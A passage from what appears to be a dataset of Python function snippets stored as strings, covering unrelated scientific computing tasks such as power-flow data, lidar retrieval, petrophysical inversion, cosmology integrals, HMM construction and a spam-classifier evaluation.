0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 
250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, [2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data -----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) for px in p]\n # 2. 
construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def E_Dynamic_MavkoEtAl2009(rhob,DTS,PR):\n E = (2*(rhob*1000)*((304800/DTS)**2)*(1+PR))/1000000\n return E", "def TDErrorFunction(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0,lam=[0,0,0,0,0,0]):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)+Prof['HSRL Mol BG']\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)+Prof['HSRL Comb BG']\n \n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)+Prof['WV Online BG']\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)+Prof['WV Offline BG']\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)+Prof['O2 Online BG']\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)+Prof['O2 Offline BG']\n \n# # Optimization error. 
T is piecewise\n# OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n# +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n# +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n# +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n# +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n# +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n# +lam[0]*np.nansum(np.abs(np.diff(xS[:,0]))) \\\n# +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n# +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n# +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n# +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n# +lam[5]*np.nansum(np.abs(np.diff(xS[:,5]))) \n \n # Optimization error. T is piecewise slope\n OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n +lam[0]*np.nansum(np.abs(np.diff(np.diff(xS[:,0])))) \\\n +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n +lam[5]*np.nansum(np.abs(np.diff(xS[:,5])))\n \n return OptError", "def _r_inv(self):\n raise NotImplementedError", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def intf_ENTPGRAM(E):\n # !! Need to check for some eids being TRIs. 
Filter that out.\n if ( not inc.entid_or_LST_of_entids(E.The,3) or \n not inc.point_formatted_LST(E.The,2) or\n not inc.point_formatted_LST(E.The,1) ):\n print(\"Input Error: pgram\")\n print(intf_ENTPGRAM.__doc__)\n return # Without doing much of anything.\n oB= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n oA= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n myeids= E.The.StackPop().val\n if type(myeids)==type(list()):\n #myeids= map(lambda x:x.val, myeids) # Should now be a list of ints.\n myeids= [x.val for x in myeids] # Should now be a list of ints.\n else:\n myeids= [ myeids ] # Also a (1 item) list of ints.\n neweidlist= []\n for myeid in myeids:\n if myeid in MMEL.El: # Check if eid exists.\n src_ent= MMEL.El[myeid]\n new_ent= src_ent.duplicate()\n new_ent.translate([ oB[0]-oA[0], oB[1]-oA[1], oB[2]-oA[2] ])\n As= mm.Entity.allplist.PLdict[ src_ent.epts[0] ]\n Ae= mm.Entity.allplist.PLdict[ src_ent.epts[1] ]\n Bs= mm.Entity.allplist.PLdict[ new_ent.epts[0] ]\n Be= mm.Entity.allplist.PLdict[ new_ent.epts[1] ]\n neweidlist.append(new_ent.eid)\n MMEL.add_ent(new_ent)\n line_entS= mm.Line_Entity( [As,Bs] )\n neweidlist.append(line_entS.eid)\n MMEL.add_ent(line_entS)\n line_entE= mm.Line_Entity( [Ae,Be] )\n neweidlist.append(line_entE.eid)\n MMEL.add_ent(line_entE)\n tri_entA= mm.Tri_Entity( [As, Ae, Bs] )\n neweidlist.append(tri_entA.eid)\n MMEL.add_ent(tri_entA)\n tri_entB= mm.Tri_Entity( [Bs, Be, Ae] )\n neweidlist.append(tri_entB.eid)\n MMEL.add_ent(tri_entB)\n else:\n print(\"WARNING: Entity ID# %d does not exist.\" % myeid)\n if neweidlist:\n neweids= objectifier.StackOB_LST( [objectifier.StackOB_VAL(x) for x in neweidlist] )\n E.The.StackPush(neweids)\n OUT.default(MMEL,E) # AUTODUMP ", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# 
--------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. 
Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n -0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: 
{!r}\".format(qtc_type)))\n \n qtc = []\n \n if qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n 
\"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def prove_I0() -> Proof:\n # Task 4.8", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x = math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n #print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n Recall = 